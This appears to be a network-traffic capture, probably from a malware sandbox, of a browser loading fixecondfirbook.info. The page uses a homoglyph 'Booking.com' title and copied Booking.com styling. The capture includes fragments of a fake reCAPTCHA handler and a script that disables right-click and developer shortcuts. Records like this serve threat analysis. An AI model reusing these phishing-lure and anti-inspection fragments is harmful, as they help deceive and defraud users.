2025-01-16 16:16:22 UTC	684	OUT	GET / HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: http://clintonmakes.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:22 UTC	932	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9pieG8iioqAojMMSX%2Fnn6eBV9bzZzPcAE4KA2%2B0lAcduBX9MEf3DY8lr%2Fv%2BbFJ6tYwgRt0qCA93YYfQeSg%2FZzM5bZWOkybtW5DgKJZz3m5zJ%2BQDb1ToaM44cXne8EG%2FiZDwbd7u4Ig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68db4e23ab3e-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14089&min_rtt=14048&rtt_var=5350&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=1262&delivery_rate=203073&cwnd=32&unsent_bytes=0&cid=98a8c5381f0d5e77&ts=381&x=0"
2025-01-16 16:16:22 UTC	437	IN	Data Raw: 33 33 36 37 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 42 d0 be d0 be 6b 69 6e 67 2e d1 81 d0 be 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a Data Ascii: 3367<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Bking.m</title> <style> body { margin: 0; font-family: Arial, sans-serif;
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 65 69 67 68 74 3a 20 35 35 70 78 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2d 32 30 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 Data Ascii: eight: 55px; justify-content: space-between; align-items: center; left: 0; } header h1 { margin: 0; font-size: 20px; } .content { max-width: 400px; margin: -20px auto; background: white;
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 34 30 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 35 70 78 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 37 31 63 32 3b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 72 20 7b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 Data Ascii: 400px; margin-top: -45px; font-size: 12px; color: #666; } footer a { color: #0071c2; text-decoration: none; } footer a:hover { text-decoration: underline; } hr { -webkit-font-smoothing:
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 3a 20 23 66 63 62 34 62 34 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 65 72 3a 20 23 66 66 65 62 65 62 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 64 65 73 74 72 75 63 74 69 76 65 5f 6c 69 67 68 74 65 73 74 3a 20 23 66 66 66 30 66 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 64 61 72 6b 3a 20 23 62 63 35 62 30 31 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 3a 20 23 66 66 38 30 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 Data Ascii: color_destructive: #c00; --bui_color_destructive_light: #fcb4b4; --bui_color_destructive_lighter: #ffebeb; --bui_color_destructive_lightest: #fff0f0; --bui_color_callout_dark: #bc5b01; --bui_color_callout: #ff8000; --bu
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 74 69 6f 6e 5f 6c 69 67 68 74 65 72 3a 20 23 65 34 66 34 66 66 3b 0a 20 20 20 20 20 20 2d 2d 67 65 6e 69 75 73 5f 63 6f 6c 6f 72 5f 70 72 69 6d 61 72 79 3a 20 23 30 30 34 63 62 38 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 62 61 73 65 6c 69 6e 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6e 65 67 61 74 69 76 65 5f 70 61 64 64 69 6e 67 3a 20 2d 31 32 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6d 65 64 69 75 6d 5f 62 72 65 61 6b 70 6f 69 6e 74 3a 20 35 37 36 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 6c 61 72 67 65 5f 62 72 65 61 6b 70 6f 69 6e 74 3a 20 31 30 32 34 70 78 3b 0a 20 20 20 Data Ascii: ; --bui_color_action_lighter: #e4f4ff; --genius_color_primary: #004cb8; --bui_baseline: 24px; --bui_padding: 12px; --bui_negative_padding: -12px; --bui_medium_breakpoint: 576px; --bui_large_breakpoint: 1024px;
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 6f 6e 74 5f 6c 61 72 67 65 73 74 5f 6c 69 6e 65 5f 68 65 69 67 68 74 3a 20 34 30 70 78 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 6e 6f 72 6d 61 6c 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 6d 65 64 69 75 6d 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 77 65 69 67 68 74 5f 62 6f 6c 64 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 66 6f 6e 74 5f 73 74 61 63 6b 5f 73 61 6e 73 3a 20 22 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 22 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 52 6f 62 6f 74 6f 22 2c 20 22 48 65 6c 76 65 74 69 63 61 22 2c 20 22 41 72 69 61 6c 22 2c 20 73 61 6e 73 2d Data Ascii: ont_largest_line_height: 40px; --bui_font_weight_normal: 400; --bui_font_weight_medium: 500; --bui_font_weight_bold: 700; --bui_font_stack_sans: "BlinkMacSystemFont", -apple-system, "Segoe UI", "Roboto", "Helvetica", "Arial", sans-
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 20 23 34 37 34 37 34 37 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 66 6f 72 65 67 72 6f 75 6e 64 5f 69 6e 76 65 72 74 65 64 3a 20 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 30 30 33 62 39 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 39 34 36 38 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 74 69 6f 6e 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 30 30 36 63 65 34 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 66 6f 72 65 67 72 6f 75 6e 64 3a 20 23 39 32 33 65 30 31 3b 0a 20 20 20 20 20 Data Ascii: #474747; --bui_color_foreground_inverted: #f5f5f5; --bui_color_brand_primary_foreground: #003b95; --bui_color_accent_foreground: #946800; --bui_color_action_foreground: #006ce4; --bui_color_callout_foreground: #923e01;
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 6f 6e 5f 62 72 61 6e 64 5f 67 65 6e 69 75 73 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 69 6e 76 65 72 74 65 64 3a 20 23 31 61 31 61 31 61 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 37 34 37 34 37 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 74 72 61 6e 73 70 61 72 65 6e 74 3a 20 72 67 62 61 28 32 36 2c 20 32 36 2c 20 32 36 2c 20 30 29 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 61 6c 74 3a 20 23 Data Ascii: ry_background: #fff; --bui_color_on_brand_genius_primary_background: #fff; --bui_color_background_inverted: #1a1a1a; --bui_color_background: #474747; --bui_color_transparent: rgba(26, 26, 26, 0); --bui_color_background_alt: #
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 74 72 75 63 74 69 76 65 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 6f 6e 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 62 72 61 6e 64 5f 70 72 69 6d 61 72 79 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 30 30 33 62 39 35 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 3a 20 23 66 66 62 37 30 30 3b 0a 20 20 20 20 20 20 2d 2d 62 75 69 5f 63 6f 6c 6f 72 5f 63 61 6c 6c 6f 75 74 5f 62 61 63 6b 67 72 6f 75 6e 64 5f 64 79 6e 61 6d 69 63 Data Ascii: tructive_background_dynamic: #fff; --bui_color_on_brand_primary_background_dynamic: #fff; --bui_color_brand_primary_background_dynamic: #003b95; --bui_color_accent_background_dynamic: #ffb700; --bui_color_callout_background_dynamic
2025-01-16 16:16:22 UTC	1369	IN	Data Raw: 6f 6e 74 5f 62 6f 64 79 5f 31 5f 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 6f 6e 74 5f 62 6f 64 79 5f 31 5f 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 53 65 67 6f 65 20 55 49 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 6f 6e 74 5f 62 6f 64 79 5f 32 5f 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 2d 2d 44 4f 5f 4e 4f 54 5f 55 53 45 5f 62 75 69 5f 73 6d 61 6c 6c 5f 66 Data Ascii: ont_body_1_line-height: 24px; --DO_NOT_USE_bui_small_font_body_1_font-family: BlinkMacSystemFont, -apple-system, Segoe UI, Roboto, Helvetica, Arial, sans-serif; --DO_NOT_USE_bui_small_font_body_2_font-size: 14px; --DO_NOT_USE_bui_small_f

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:23 UTC	542	OUT	GET /languageRevert.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:24 UTC	961	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:24 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 874 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"36a-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shi11C6cN21eCiHoqlsCm3bHlfcn%2FU2o4SU1k9XDRM13AVRgXlaZjr4v0XqigzQX9kONUk9ID9i2huIEkYwAo4a35kd2McS2DWZ0wou12V5Pwo45Bt0J0yrjb3mvgYINejR5hqqWcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68e5aa37aba0-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14439&min_rtt=14420&rtt_var=5421&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1120&delivery_rate=202496&cwnd=32&unsent_bytes=0&cid=653fa278392534fb&ts=391&x=0"
2025-01-16 16:16:24 UTC	408	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 76 65 72 74 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 65 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 21 3d 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 63 6f 6e 73 74 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 Data Ascii: (function() { function revertLanguageChange() { if (document.documentElement.lang !== originalLang) { document.documentElement.lang = originalLang; } } const originalLang = document.documentElement.lang; const
2025-01-16 16:16:24 UTC	466	IN	Data Raw: 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6f 6e 74 65 78 74 6d 65 6e 75 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 7d 2c 20 66 61 6c 73 65 29 3b 0a 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 65 76 65 6e 74 2e 63 74 72 6c 4b 65 79 20 7c 7c 20 65 76 65 6e 74 2e 6d 65 74 61 4b 65 79 29 20 26 26 20 65 76 65 6e 74 2e 73 68 69 66 74 4b 65 79 20 26 26 20 65 76 65 6e 74 2e 6b 65 79 2e 74 6f 4c 6f 77 65 72 43 Data Ascii: document.addEventListener('contextmenu', function(event) { event.preventDefault(); }, false); document.addEventListener('keydown', function(event) { if ((event.ctrlKey \|\| event.metaKey) && event.shiftKey && event.key.toLowerC

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:23 UTC	542	OUT	GET /captchaHandler.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:24 UTC	967	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:24 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 586 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:38 GMT ETag: W/"24a-19440759fb0" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdOOqup7wDX6475SyX6CO3YccTCqRlMVaGQSn4RbY2EcCq38oKQXNvh%2F0kjv1XeoUp5Gk%2FkjLl9L0uYMKGLqRDdaz5sUcTkXTeqUnvMk6sE%2BC0sDtYuml9EVudDZBLCACEI%2FFkB4nw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68e5aa56c553-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19303&min_rtt=8104&rtt_var=10524&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=1120&delivery_rate=360315&cwnd=32&unsent_bytes=0&cid=49f6f424b32dc0a3&ts=365&x=0"
2025-01-16 16:16:24 UTC	402	IN	Data Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 72 65 63 61 70 74 63 68 61 2d 63 68 65 63 6b 62 6f 78 27 29 3b 0a 20 20 20 20 69 66 20 28 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 63 61 70 74 63 68 61 43 68 65 63 6b 62 6f 78 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 d0 9e d1 82 d0 bf d1 80 d0 b0 Data Ascii: document.addEventListener('DOMContentLoaded', function() { const recaptchaCheckbox = document.querySelector('.recaptcha-checkbox'); if (recaptchaCheckbox) { recaptchaCheckbox.addEventListener('click', function() { //
2025-01-16 16:16:24 UTC	184	IN	Data Raw: 20 20 20 20 20 20 20 69 66 20 28 72 65 73 70 6f 6e 73 65 2e 6f 6b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 7d 29 3b 20 0a Data Ascii: if (response.ok) { console.log(''); } else { console.error(''); } }); }); }});

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:16:25 UTC	361	OUT	GET /languageRevert.js HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:16:25 UTC	964	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:16:25 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 874 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"36a-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FkmckWULbt6p1WmTnQP7m%2Bry6ZpIQtZwkEtySJUFW7VicNVi7mffyu2EFuUzYtdnWX4ljLNvk4K6cP5T%2Fzo%2B3mQt97gtL0wRueOEwyFxVMk3IxIxTp9IaXuHZzDG6JAUSHvwO1DlfQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f68ee188ddda4-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8472&min_rtt=8456&rtt_var=3204&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=939&delivery_rate=339969&cwnd=32&unsent_bytes=0&cid=ff19b58552eee7d7&ts=379&x=0"
2025-01-16 16:16:25 UTC	405	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 76 65 72 74 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 65 28 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 21 3d 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 20 3d 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 0a 20 20 20 20 63 6f 6e 73 74 20 6f 72 69 67 69 6e 61 6c 4c 61 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 6c 61 6e 67 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 Data Ascii: (function() { function revertLanguageChange() { if (document.documentElement.lang !== originalLang) { document.documentElement.lang = originalLang; } } const originalLang = document.documentElement.lang; const
2025-01-16 16:16:25 UTC	469	IN	Data Raw: 29 3b 0a 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6f 6e 74 65 78 74 6d 65 6e 75 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 7d 2c 20 66 61 6c 73 65 29 3b 0a 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6b 65 79 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 65 76 65 6e 74 2e 63 74 72 6c 4b 65 79 20 7c 7c 20 65 76 65 6e 74 2e 6d 65 74 61 4b 65 79 29 20 